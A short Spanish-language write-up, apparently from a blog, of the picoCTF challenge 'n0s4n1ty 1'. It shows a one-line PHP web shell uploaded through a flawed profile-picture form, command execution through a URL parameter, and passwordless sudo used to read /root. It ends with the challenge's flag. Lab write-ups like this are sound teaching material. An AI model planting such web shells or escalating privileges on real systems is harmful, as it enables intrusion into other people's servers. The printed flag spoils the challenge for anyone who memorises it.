n0s4n1ty 1 writeup

Descripción

A developer has added profile picture upload functionality to a website. However, the implementation is flawed, and it presents an opportunity for you. Your mission, should you choose to accept it, is to navigate to the provided web page and locate the file upload area. Your ultimate goal is to find the hidden flag located in the /root directory.

You can access the web application here!

n0s4n1ty 1 solución

Accedemos a la página web y encontraremos un formulario para subir archivos:

Crearemos el siguiente archivo y lo llamaremos ‘shell.php’:

<?php
  system($_GET['cmd']);
?>

Lo subiremos y accederemos a la ruta que nos indica la página web donde se encuentra el archivo. Ahí, si añadimos el parámetro cmd a la URL, podremos ejecutar comandos:

Nota: Los comandos se deben de introducir codificados como URL. los espacios pasarán a ser ‘+’.

La descripción del CTF nos dice que tenemos que entrar en la carpeta /root. Para ello, tendremos que ejecutar el comando con permisos de root:

Nota: Esto es posible debido a que el usuario www-data puede usar sudo sin proporcionar una contraseña. Podemos comprobar esto si introducimos sudo+l

Con esto obtenemos la flag: ‘picoCTF{wh47_c4n_u_d0_wPHP_f7424fc7}’.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *